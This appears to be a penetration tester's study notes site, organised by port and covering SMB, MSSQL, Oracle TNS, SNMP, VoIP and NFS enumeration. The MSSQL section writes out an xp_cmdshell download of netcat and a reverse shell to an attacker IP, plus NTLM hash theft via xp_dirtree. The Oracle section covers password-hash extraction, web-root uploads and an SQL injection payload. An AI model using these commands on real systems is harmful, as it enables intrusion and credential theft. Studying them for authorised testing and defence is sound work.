    net use n: \\\\$IP$\\Finance\n# n: map its content to the drive letter\u00a0`n`\n\n\n# Provide user and password\nnet use n: \\\\$IP$\\Finance /user:plaintext Password123\n\n# how many files the shared folder and its subdirectories contain.\ndir n: /a-d /s /b | find /c \":\\\"\n# dir   Application\n# n:    Directory or drive to search\n# /a-d  /a is the attribute and -d means not directories\n# /s    Displays files in a specified directory and all subdirectories\n# /b    Uses bare format (no heading information or summary)\n# | find /c \":\\\\\" :  count how many files exist in the directory and subdirectories\n\n# Return files that contain string \"cred\" in the name\ndir n:\\*cred* /s /b\n\n# Return files that contain string \"password\" within \nfindstr /s /i password n:\\*.*\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#using-powershell","title":"Using powershell","text":"
    # List contents of folder Finance\nGet-ChildItem \\\\$IP$\\Finance\\\n\n# Connect to a share \nNew-PSDrive -Name \"N\" -Root \"\\\\$IP\\Finance\" -PSProvider \"FileSystem\"\n\n# To provide a username and password with Powershell, we need to create a PSCredential. It offers a centralized way to manage usernames, passwords, and credentials.\n$username = 'plaintext'\n$password = 'Password123'\n$secpassword = ConvertTo-SecureString $password -AsPlainText -Force\n$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword\nNew-PSDrive -Name \"N\" -Root \"\\\\$IP\\Finance\" -PSProvider \"FileSystem\" -Credential $cred\n\n# Count elements in a folder\n(Get-ChildItem -File -Recurse | Measure-Object).Count\n\n# Return files that contain string \"cred\" in the name\nGet-ChildItem -Recurse -Path N:\\ -Include *cred* -File\n\n# Return files that contain string \"password\" within \nGet-ChildItem -Recurse -Path N:\\ | Select-String \"password\" -List\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#linux","title":"Linux","text":"
    # mount folder\nsudo mkdir /mnt/Finance\nsudo mount -t cifs -o username=plaintext,password=Password123,domain=. //$IP/Finance /mnt/Finance\n\n# As an alternative, we can use a credential file.\nmount -t cifs //$IP/Finance /mnt/Finance -o credentials=/path/credentialfile\n\n# The file credentialfile has to be structured like this:\n# username=plaintext\n# password=Password123\n# domain=.\n\n# Return files that contain string \"cred\" in the name  \nfind /mnt/Finance/ -name *cred*\n\n# Return files that contain string \"password\" within \ngrep -rn /mnt/Finance/ -ie password\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"1433-mssql/","title":"1433 msSQL","text":"

    See msSQL.

    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#enumeration","title":"Enumeration","text":"

    Basic enumeration:

    nmap -Pn -sV -sC -p1433 $ip\n

    If you don't know anything about the service:

    nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $ip\n# Prepend sudo if the scan needs raw socket privileges\n

    We can also use Metasploit to run an auxiliary scanner called mssql_ping that will scan the MSSQL service and provide helpful information in our footprinting process.
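    Loading the module looks like this (a sketch; the output in the next section assumes it is already selected):

    msfconsole -q\nuse auxiliary/scanner/mssql/mssql_ping\n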

    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#mssql-ping-in-metasploit","title":"MSSQL Ping in Metasploit","text":"
    msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 10.129.201.248\n\nrhosts => 10.129.201.248\n\n\nmsf6 auxiliary(scanner/mssql/mssql_ping) > run\n\n[*] 10.129.201.248:       - SQL Server information for 10.129.201.248:\n[+] 10.129.201.248:       -    ServerName      = SQL-01\n[+] 10.129.201.248:       -    InstanceName    = MSSQLSERVER\n[+] 10.129.201.248:       -    IsClustered     = No\n[+] 10.129.201.248:       -    Version         = 15.0.2000.5\n[+] 10.129.201.248:       -    tcp             = 1433\n[+] 10.129.201.248:       -    np              = \\\\SQL-01\\pipe\\sql\\query\n[*] 10.129.201.248:       - Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\n
    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#connecting-with-mssqlclientpy","title":"Connecting with Mssqlclient.py","text":"

    If we can guess or gain access to credentials, this allows us to remotely connect to the MSSQL server and start interacting with databases using T-SQL (Transact-SQL). Authenticating with MSSQL will enable us to interact directly with databases through the SQL Database Engine. From Pwnbox or a personal attack host, we can use Impacket's mssqlclient.py to connect as seen in the output below. Once connected to the server, it may be good to get a lay of the land and list the databases present on the system.

    python3 mssqlclient.py Administrator@$ip -windows-auth\n# python3 mssqlclient.py -h shows more options.\n
    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#basic-mssql-commands","title":"Basic mssql commands","text":"
    # Get Microsoft SQL server version\nselect @@version;\n\n# Get usernames\nselect user_name()\ngo\n\n# Get databases\nSELECT name FROM master.dbo.sysdatabases\ngo\n\n# Get current database\nSELECT DB_NAME()\ngo\n\n# Get a list of users in the domain\nSELECT name FROM master..syslogins\ngo\n\n# Get a list of users that are sysadmins\nSELECT name FROM master..syslogins WHERE sysadmin = 1\ngo\n\n# And to make sure:\nSELECT is_srvrolemember('sysadmin')\ngo\n# If your user is admin, it will return 1.\n\n# Read local files in MSSQL\nSELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents\ngo\n
    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#attacks","title":"Attacks","text":"","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#executing-cmd-shell-in-a-sql-command-line","title":"Executing cmd shell in a SQL command line","text":"

    Our goal can be to spawn a Windows command shell and pass in a string for execution. For that, Microsoft SQL Server provides the xp_cmdshell command, which lets us use the SQL command line as a CLI.

    Because malicious users sometimes attempt to elevate their privileges by using xp_cmdshell, it is disabled by default. xp_cmdshell can be enabled and disabled by using Policy-Based Management or by executing sp_configure.

    sp_configure displays or changes global configuration settings for the current server. This is how you may take advantage of it:

    # To allow advanced options to be changed.   \nEXECUTE sp_configure 'show advanced options', 1\ngo\n\n# To update the currently configured value for advanced options.  \nRECONFIGURE\ngo\n\n# To enable the feature.  \nEXECUTE sp_configure 'xp_cmdshell', 1\ngo\n\n# To update the currently configured value for this feature.  \nRECONFIGURE\ngo\n

    Note: The Windows process spawned by xp_cmdshell has the same security rights as the SQL Server service account.

    Now we can use the msSQL terminal to execute commands:

    # This will return the .exe files existing in the current directory\nEXEC xp_cmdshell 'dir *.exe'\ngo\n\n# To print a file\nEXECUTE xp_cmdshell 'type c:\\Users\\sql_svc\\Desktop\\user.txt'\ngo\n\n# With this (and a \"python3 -m http.server 80\" from our kali serving a file) we can upload a file to the attacked machine, for instance a reverse shell like nc64.exe\nxp_cmdshell \"powershell -c cd C:\\Users\\sql_svc\\Downloads; wget http://IPfromOurKali/nc64.exe -outfile nc64.exe\"\ngo\n\n# We could also bind this cmd.exe through the nc to our listener. For that, open a different tab in kali and do a \"nc -lnvp 443\". When launching the reverse shell, we'll get a powershell terminal in this tab by running:\nxp_cmdshell \"powershell -c cd C:\\Users\\sql_svc\\Downloads; .\\nc64.exe -e cmd.exe IPfromOurKali 443\";\n# You could also upload winPEAS and run it from this powershell command line\n

    There are other methods to get command execution, such as adding extended stored procedures, CLR Assemblies, SQL Server Agent Jobs, and external scripts.

    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#capture-mssql-service-hash","title":"Capture MSSQL Service Hash","text":"

    We can steal the MSSQL service account hash using the xp_subdirs or xp_dirtree undocumented stored procedures, which use the SMB protocol to retrieve a list of child directories under a specified parent directory from the file system.

    When we use one of these stored procedures and point it to our SMB server, the directory listing functionality will force the server to authenticate and send the NTLMv2 hash of the service account that is running the SQL Server.

    1. First, start Responder or smbserver from impacket.

    2. Run:

    # For XP_DIRTREE Hash Stealing\nEXEC master..xp_dirtree '\\\\$KaliIP\\share\\'\n\n# For XP_SUBDIRS Hash Stealing\nEXEC master..xp_subdirs '\\\\$KaliIP\\share\\'\n

    If the service account has access to our server, we will obtain its hash. We can then attempt to crack the hash or relay it to another host.

    3. XP_SUBDIRS Hash Stealing with Responder

    sudo responder -I tun0\n

    4. XP_SUBDIRS Hash Stealing with impacket

    sudo impacket-smbserver share ./ -smb2support\n
    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#impersonate-existing-users-with-mssql","title":"Impersonate Existing Users with MSSQL","text":"

    SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends:

    Impersonating sysadmin

    # Identify Users that We Can Impersonate\nSELECT distinct b.name \nFROM sys.server_permissions a \nINNER JOIN sys.server_principals b \nON a.grantor_principal_id = b.principal_id \nWHERE a.permission_name = 'IMPERSONATE'\ngo\n\n# Verify if our current user has the sysadmin role:\nSELECT SYSTEM_USER\nSELECT IS_SRVROLEMEMBER('sysadmin')\ngo\n#  value 0 indicates no sysadmin role, value 1 is sysadmin role\n

    Impersonating sa user

    USE master\nEXECUTE AS LOGIN = 'sa'\nSELECT SYSTEM_USER\nSELECT IS_SRVROLEMEMBER('sysadmin')\ngo\n

    It's recommended to run EXECUTE AS LOGIN within the master DB, because all users, by default, have access to that database.

    To revert the operation and return to our previous user

    REVERT\ngo\n
    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#communicate-with-other-databases-with-mssql","title":"Communicate with Other Databases with MSSQL","text":"

    MSSQL has a configuration option called linked servers. Linked servers are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another database product such as Oracle.

    If we manage to gain access to a SQL Server with a linked server configured, we may be able to move laterally to that database server.

    # Identify linked Servers in MSSQL\nSELECT srvname, isremote FROM sysservers\ngo\n
    srvname                             isremote\n----------------------------------- --------\nDESKTOP-MFERMN4\\SQLEXPRESS          1\n10.0.0.12\\SQLEXPRESS                0\n\n# isremote: 1 means a remote server, and 0 means a linked server.\n
    #  Identify the user used for the connection and its privileges:\nEXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\\SQLEXPRESS]\ngo\n\n# The EXECUTE statement can be used to send pass-through commands to linked servers. We add our command between parentheses and specify the linked server between square brackets ([ ]).\n

    If we need to use quotes in our query to the linked server, we have to double up the single quotes to escape them. To run multiple commands at once, we can separate them with a semicolon (;).
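    A sketch illustrating both points against the linked server from the example above (the two commands are placeholders):

    # Doubled single quotes escape the quote; a semicolon separates the two commands\nEXECUTE('EXEC master..xp_cmdshell ''whoami''; EXEC master..xp_cmdshell ''ipconfig''') AT [10.0.0.12\\SQLEXPRESS]\ngo\n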

    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#sources-and-resources","title":"Sources and resources","text":"
    • nc64.exe.
    • Impacket: mssqlclient.py.
    • Pentesmonkey Cheat sheet.
    • book.hacktricks.xyz.
    • winPEAS.
    ","tags":["mssql","port 1433","impacket"]},{"location":"1521-oracle-transparent-network-substrate/","title":"1521 - Oracle Transparent Network Substrate (TNS)","text":"

    The Oracle Transparent Network Substrate (TNS) server is a communication protocol that facilitates communication between Oracle databases and applications over networks. TNS supports various networking protocols between Oracle databases and client applications, such as IPX/SPX and TCP/IP protocol stacks. As a result, it has become a preferred solution for managing large, complex databases in the healthcare, finance, and retail industries.

    Additionally, it supports IPv6 and SSL/TLS encryption, which makes it suitable for name resolution, connection management, load balancing, and security.

    Oracle TNS is often used with other Oracle services like Oracle DBSNMP, Oracle Databases, Oracle Application Server, Oracle Enterprise Manager, Oracle Fusion Middleware, web servers, and many more:

    • Oracle Enterprise Manager: a tool to start, stop, or restart an instance, adjust its memory allocation and other configuration parameters, and monitor its performance.
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#footprinting-oracle-tns","title":"Footprinting Oracle TNS","text":"

    Let's now use nmap to scan the default Oracle TNS listener port:

    sudo nmap -p1521 -sV $ip --open\n
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#enumerating-sids","title":"Enumerating SIDs","text":"

    In Oracle relational databases, also known as Oracle RDBMS, there are System Identifiers (SID).

    A System Identifier (SID) is a unique name that identifies a particular database instance. A database can have multiple instances, each with its own SID. An instance is a set of processes and memory structures that interact to manage the database's data.

    The client uses this SID to identify which database instance it wants to connect to. If the request does not include a SID, the default value defined in the tnsnames.ora file is used.

    sudo nmap -p1521 -sV $ip --open --script oracle-sid-brute\n
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#more-enumeration-with-odat","title":"More enumeration with ODAT","text":"

    We can use odat.py from the ODAT tool to retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations, and more.

    ./odat.py all -s $ip\n

    Additionally, if you have sysdba admin rights, you might upload a web shell to the target (more in odat).

    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#connect-to-oracle-database-sqlplus","title":"Connect to Oracle database: sqlplus","text":"

    If we manage to get some credentials we can connect to the Oracle TNS service with sqlplus.

    sqlplus <username>/<password>@$ip/XE;\n

    If you get the error message "sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory", there might be an issue with the libraries. Possible solution:

    sudo sh -c \"echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf\";sudo ldconfig\n

    The System Database Admin in an Oracle RDBMS is sysdba. If a user has more privileges than they should, we can try to exploit it by connecting as sysdba.

    sqlplus <user>/<password>@$ip/XE as sysdba\n
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#upload-a-web-shell","title":"Upload a web shell","text":"

    If we have sysdba admin rights, we might upload a web shell to the target. This requires the server to run a web server, and we need to know the exact location of the root directory for the webserver.

    # 1. Create a non suspicious web shell \necho \"Oracle File Upload Test\" > testing.txt\n\n# 2. Upload  the shell to linux (/var/www/html) or windows (C:\\\\inetpub\\\\wwwroot):\n./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\\\inetpub\\\\wwwroot testing.txt ./testing.txt\n\n## 3. Test if the file upload approach worked with curl, or visit via browser.\ncurl -X GET http://$ip/testing.txt\n
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#oracle-basic-commands","title":"Oracle basic commands","text":"
    # List all available tables in the current database\nselect table_name from all_tables;\n\n# Show the privileges of the current user\nselect * from user_role_privs;\n\n# If we have sysdba admin rights, we might:\n    ## 1. enumerate all databases\nselect * from user_role_privs;\n\n    ## 2. extract Password Hashes\nselect name, password from sys.user$;\n\n    ## 3. upload a web shell to the target. This requires the server to run a web server, and we need to know the exact location of the root directory for the webserver.\n    ## 1. Creating a non suspicious web shell \necho \"Oracle File Upload Test\" > testing.txt\n    ## 2. Uploading the shell to linux (/var/www/html) or windows (C:\\\\inetpub\\\\wwwroot):\n./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\\\inetpub\\\\wwwroot testing.txt ./testing.txt\n
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#how-does-oracle-tns-work","title":"How does Oracle TNS work","text":"","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#technical-components","title":"Technical components","text":"

    The listener:

    By default, the listener listens for incoming connections on the TCP/1521 port. However, this default port can be changed during installation or later in the configuration file. The TNS listener is configured to support various network protocols, including TCP/IP, UDP, IPX/SPX, and AppleTalk. The listener can also support multiple network interfaces and listen on specific IP addresses or all available network interfaces. By default, Oracle TNS can be remotely managed in Oracle 8i/9i but not in Oracle 10g/11g.

    Additionally, the listener will use Oracle Net Services to encrypt the communication between the client and the server.

    Configuration files for Oracle TNS

    The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the ORACLE_HOME/network/admin directory. The client-side Oracle Net Services software uses the tnsnames.ora file to resolve service names to network addresses, while the listener process uses the listener.ora file to determine the services it should listen to and the behavior of the listener.

    tnsnames.ora

    Each database or service has a unique entry in the tnsnames.ora file, containing the necessary information for clients to connect to the service. The entry consists of a name for the service, the network location of the service, and the database or service name that clients should use when connecting to the service.

    ORCL =\n  (DESCRIPTION =\n    (ADDRESS_LIST =\n      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))\n    )\n    (CONNECT_DATA =\n      (SERVER = DEDICATED)\n      (SERVICE_NAME = orcl)\n    )\n  )\n

    listener.ora

    The listener.ora file is a server-side configuration file that defines the listener process's properties and parameters, which is responsible for receiving incoming client requests and forwarding them to the appropriate Oracle database instance.

    SID_LIST_LISTENER =\n  (SID_LIST =\n    (SID_DESC =\n      (SID_NAME = PDB1)\n      (ORACLE_HOME = C:\\oracle\\product\\19.0.0\\dbhome_1)\n      (GLOBAL_DBNAME = PDB1)\n      (SID_DIRECTORY_LIST =\n        (SID_DIRECTORY =\n          (DIRECTORY_TYPE = TNS_ADMIN)\n          (DIRECTORY = C:\\oracle\\product\\19.0.0\\dbhome_1\\network\\admin)\n        )\n      )\n    )\n  )\n\nLISTENER =\n  (DESCRIPTION_LIST =\n    (DESCRIPTION =\n      (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521))\n      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))\n    )\n  )\n\nADR_BASE_LISTENER = C:\\oracle\n
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#default-passwords","title":"Default passwords","text":"
    • Oracle 9 has a default password, CHANGE_ON_INSTALL.
    • Oracle 10 has no default password set.
    • The Oracle DBSNMP service also uses a default password, dbsnmp.
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#plsql-exclusion-list","title":"PL/SQL Exclusion List","text":"

    Oracle databases can be protected by using a so-called PL/SQL Exclusion List (PlsqlExclusionList). It is a user-created text file that needs to be placed in the $ORACLE_HOME/sqldeveloper directory, and it contains the names of PL/SQL packages or types that should be excluded from execution. Once the PL/SQL Exclusion List file is created, it can be loaded into the database instance. It serves as a blacklist of packages that cannot be accessed through the Oracle Application Server.

    • DESCRIPTION: A descriptor that provides a name for the database and its connection type.
    • ADDRESS: The network address of the database, which includes the hostname and port number.
    • PROTOCOL: The network protocol used for communication with the server.
    • PORT: The port number used for communication with the server.
    • CONNECT_DATA: Specifies the attributes of the connection, such as the service name or SID, protocol, and database instance identifier.
    • INSTANCE_NAME: The name of the database instance the client wants to connect to.
    • SERVICE_NAME: The name of the service that the client wants to connect to.
    • SERVER: The type of server used for the database connection, such as dedicated or shared.
    • USER: The username used to authenticate with the database server.
    • PASSWORD: The password used to authenticate with the database server.
    • SECURITY: The type of security for the connection.
    • VALIDATE_CERT: Whether to validate the certificate using SSL/TLS.
    • SSL_VERSION: The version of SSL/TLS to use for the connection.
    • CONNECT_TIMEOUT: The time limit in seconds for the client to establish a connection to the database.
    • RECEIVE_TIMEOUT: The time limit in seconds for the client to receive a response from the database.
    • SEND_TIMEOUT: The time limit in seconds for the client to send a request to the database.
    • SQLNET.EXPIRE_TIME: The time limit in seconds for the client to detect a connection has failed.
    • TRACE_LEVEL: The level of tracing for the database connection.
    • TRACE_DIRECTORY: The directory where the trace files are stored.
    • TRACE_FILE_NAME: The name of the trace file.
    • LOG_FILE: The file where the log information is stored.
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#extra-bonus-dual","title":"Extra Bonus: DUAL","text":"

    DUAL is a special one-row, one-column table present by default in all Oracle databases. The owner of DUAL is SYS, but it can be accessed by every user. This is a possible payload for SQLi:

    '+UNION+SELECT+NULL+FROM+dual--\n

    Oracle syntax requires the use of FROM, but some queries don't require any table. In these cases, we use DUAL. Also, Oracle doesn't allow queries that employ information_schema.tables.
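    A small illustration of the FROM requirement (assumed example queries):

    -- A query with no real table still needs FROM in Oracle\nSELECT 'test' FROM dual;\n\n-- Instead of information_schema.tables, list tables via the data dictionary\nSELECT table_name FROM all_tables;\n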

    ","tags":["oracle tns","port 1521","port 162"]},{"location":"161-162-snmp/","title":"161-162 SNMP Simple Network Management Protocol","text":"

    Simple Network Management Protocol (SNMP) is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behaviour.

    Simple Network Management Protocol (SNMP) was created to monitor network devices. In addition, this protocol can also be used to handle configuration tasks and change settings remotely. SNMP-enabled hardware includes routers, switches, servers, IoT devices, and many other devices that can be queried and controlled using this standard protocol.

    Managers: one or more administrative computers that have the task of monitoring or managing a group of hosts or devices on a computer network, the managed device.

    Managed devices: routers, switches, servers, IoT devices, and many other devices.

    Agent: network-management software module that resides on a managed device. An agent has local knowledge of management information and translates that information to or from an SNMP-specific form.

    In addition to the pure exchange of information, SNMP:

    • Transmits control commands using agents over UDP port 161.
    • Enables the use of so-called traps over UDP port 162. These are data packets sent from the SNMP server to the client without being explicitly requested. If a device is configured accordingly, an SNMP trap is sent to the client once a specific event occurs on the server-side.

    Management Information Base (MIB): for the SNMP client and server to exchange the respective values, the available SNMP objects must have unique addresses known on both sides. This is where the MIB comes in.

    MIB is an independent format for storing device information. A MIB is a text file in which all queryable SNMP objects of a device are listed in a standardized tree hierarchy. MIB files are written in the Abstract Syntax Notation One (ASN.1) based ASCII text format.

    Each MIB contains at least one Object Identifier (OID), which, in addition to the necessary unique address and a name, provides information about the type, access rights, and a description of the respective object. An OID represents a node in a hierarchical namespace. A sequence of numbers uniquely identifies each node, allowing the node's position in the tree to be determined. The longer the chain, the more specific the information. Many nodes in the OID tree contain nothing except references to those below them. The OIDs consist of integers and are usually concatenated in dot notation.

    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#snmpv1-snmpv2-and-snmpv3","title":"SNMPv1, SNMPv2 and SNMPv3","text":"

    SNMP version 1 (SNMPv1) is used for network management and monitoring. SNMPv1 has no built-in authentication mechanism, meaning anyone accessing the network can read and modify network data. Another main flaw of SNMPv1 is that it does not support encryption, meaning that all data is sent in plain text and can be easily intercepted.

    SNMPv2 existed in different versions. The version that still exists today is v2c; the extension c means community-based SNMP. A significant problem with the initial execution of the SNMP protocol is that the community string that provides security is only transmitted in plain text, meaning it has no built-in encryption.

    SNMPv3: The security has been increased enormously for SNMPv3 by security features such as authentication using username and password and transmission encryption (via pre-shared key) of the data. However, the complexity also increases to the same extent, with significantly more configuration options than v2c.

    How can interception happen? Community strings can be seen as passwords that are used to determine whether the requested information can be viewed or not. It is important to note that many organizations still use SNMPv2, as the transition to SNMPv3 can be very complex while the services still need to remain active. SNMP community strings provide information and statistics about a router or device. The manufacturer default community strings public and private are often left unchanged. In SNMP versions 1 and 2c, access is controlled using a plaintext community string, and if we know the name, we can gain access to the device. Examination of process parameters might reveal credentials passed on the command line, which might be possible to reuse for other externally accessible services given the prevalence of password reuse in enterprise environments. Routing information, services bound to additional interfaces, and the version of installed software can also be revealed.

    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#footprinting-snmp","title":"Footprinting SNMP","text":"

    There are tools like snmpwalk, onesixtyone, and braa.

    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#snmpwalk","title":"snmpwalk","text":"

    snmpwalk is used to query the OIDs with their information. It retrieves a subtree of management values using SNMP GETNEXT requests.

    snmpwalk -v2c -c public $ip\n
    snmpwalk -v 2c -c public $ip 1.3.6.1.2.1.1.5.0\n
    snmpwalk -v 2c -c private $ip\n

    If we do not know the community string, we can use onesixtyone and SecLists wordlists to identify these community strings.

    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#onesixtyone-fast-and-simple-snmp-scanner","title":"onesixtyone - Fast and simple SNMP scanner","text":"

    A tool such as onesixtyone can be used to brute force the community string names using a dictionary file of common community strings such as the dict.txt file included in the GitHub repo for the tool.

    onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt $ip\n

    When certain community strings are bound to specific IP addresses, they are named with the hostname of the host, and sometimes even symbols are added to these names to make them more challenging to identify.

    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#braa","title":"braa","text":"

    Knowing a community string, we can use braa to brute-force the individual OIDs and enumerate the information behind them.

    braa <community string>@$ip:.1.3.6.*   \n\n    # Example:\n    # braa public@10.129.14.128:.1.3.6.*\n
    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#installing-snmp","title":"Installing SNMP","text":"

    The default configuration of the SNMP daemon is located at /etc/snmp/snmpd.conf. It contains basic settings for the service, which include the IP addresses, ports, MIB, OIDs, authentication, and community strings. See specifics about the configuration of this file in the manpage.

    Some classic misconfigurations are:

    • rwuser noauth: Provides access to the full OID tree without authentication.
    • rwcommunity <community string> <IPv4 address>: Provides access to the full OID tree regardless of where the requests were sent from.
    • rwcommunity6 <community string> <IPv6 address>: Same access as with rwcommunity, with the difference of using IPv6.
    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#more-about-snmp-versioning-and-security","title":"More about SNMP versioning and security","text":"

    Source: wikipedia

    SNMP is available in different versions, and each has its own security issues. SNMPv1 sends passwords in clear text over the network; therefore, passwords can be read with packet sniffing. SNMPv2 allows password hashing with MD5, but this has to be configured. Virtually all network management software supports SNMPv1, but not necessarily SNMPv2 or v3. SNMPv2 was specifically developed to provide data security, that is, authentication, privacy, and authorization, but only SNMP version 2c gained the endorsement of the Internet Engineering Task Force (IETF), while versions 2u and 2* failed to gain IETF approval due to security issues. SNMPv3 uses MD5, the Secure Hash Algorithm (SHA), and keyed algorithms to offer protection against unauthorized data modification and spoofing attacks. If a higher level of security is needed, the Data Encryption Standard (DES) can optionally be used in cipher block chaining mode. SNMPv3 has been implemented on Cisco IOS since release 12.0(3)T. SNMPv3 may be subject to brute force and dictionary attacks for guessing the authentication or encryption keys if these keys are generated from short (weak) passwords or passwords that can be found in a dictionary.

    ","tags":["SNMP","port 161","port 162"]},{"location":"1720-5060-5061-voip/","title":"Ports 1720, 5060 and 5061: VoIP","text":"

    The most common VoIP ports are TCP/5060 and TCP/5061, which are used for the Session Initiation Protocol (SIP). However, the port TCP/1720 may also be used by some VoIP systems for the H.323 protocol, a set of standards for multimedia communication over packet-based networks. Still, SIP is more widely used than H.323 in VoIP systems.

    The most common SIP requests and methods are:

    • INVITE: Initiates a session or invites another endpoint to participate.
    • ACK: Confirms the receipt of an INVITE request.
    • BYE: Terminates a session.
    • CANCEL: Cancels a pending INVITE request.
    • REGISTER: Registers a SIP user agent (UA) with a SIP server.
    • OPTIONS: Requests information about the capabilities of a SIP server or user agent, such as the types of media it supports.
    "},{"location":"2049-nfs-network-file-system/","title":"Port 2049 - NFS Network File System","text":"

    Network File System (NFS) is a network file system developed by Sun Microsystems and has the same purpose as SMB: to access file systems over a network as if they were local. However, it uses an entirely different protocol. NFS is used between Linux and Unix systems. This means that NFS clients cannot communicate directly with SMB servers.

    NFS is an Internet standard that governs the procedures in a distributed file system. While NFS protocol version 3.0 (NFSv3), which has been in use for many years, authenticates the client computer, this changes with NFSv4. Here, as with the Windows SMB protocol, the user must authenticate.

    • NFSv2: It is older but is supported by many systems and was initially operated entirely over UDP.
    • NFSv3: It has more features, including variable file size and better error reporting, but is not fully compatible with NFSv2 clients.
    • NFSv4: It includes Kerberos, works through firewalls and on the Internet, no longer requires portmappers, supports ACLs, applies state-based operations, and provides performance improvements and high security. It is also the first version to have a stateful protocol.

    NFS is based on the Open Network Computing Remote Procedure Call (ONC-RPC/SUN-RPC) protocol, exposed on TCP and UDP port 111, which uses External Data Representation (XDR) for the system-independent exchange of data. The NFS protocol has no mechanism for authentication or authorization. Instead, authentication is completely shifted to the RPC protocol's options.
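    Since NFS registers with the RPC portmapper on port 111, we can list the registered RPC services before mounting anything (a quick sketch):

    # List registered RPC services via the portmapper\nrpcinfo -p $ip\n\n# Or with nmap's rpcinfo NSE script\nnmap -sV -p111 --script=rpcinfo $ip\n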

    ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#configuration-file","title":"Configuration file","text":"

    The /etc/exports file contains a table of physical filesystems on an NFS server accessible by the clients.

    The default exports file also contains some examples of configuring NFS shares. First, the folder is specified and made available to others; then the rights that a host or subnet will have on this NFS share are defined. Finally, additional options can be added for the hosts or subnets.

    • rw: Read and write permissions.
    • ro: Read only permissions.
    • sync: Synchronous data transfer. (A bit slower)
    • async: Asynchronous data transfer. (A bit faster)
    • secure: Ports above 1024 will not be used.
    • insecure: Ports above 1024 will be used.
    • no_subtree_check: This option disables the checking of subdirectory trees.
    • root_squash: Assigns all permissions to files of root UID/GID 0 to the UID/GID of anonymous, which prevents root from accessing files on an NFS mount.

    Take a look at the insecure option. It is dangerous because it allows clients to use source ports above 1024. Only root can use the first 1024 ports, so a request coming from a higher port may originate from any unprivileged user; with insecure set, the NFS service no longer rejects such requests.

    ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#mounting-a-nfs-shared-folder","title":"Mounting a NFS shared folder","text":"
    # Share the folder /mnt/nfs with the subnet $ip/24\necho \"/mnt/nfs  $ip/24(sync,no_subtree_check)\" >> /etc/exports\n\n# Restart the NFS service\nsystemctl restart nfs-kernel-server\n\nexportfs\n

    We have shared the folder /mnt/nfs with the subnet $ip/24 using the settings shown above. This means that all hosts on the network will be able to mount this NFS share and inspect its contents.

    ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#footprinting-the-service","title":"Footprinting the service","text":"
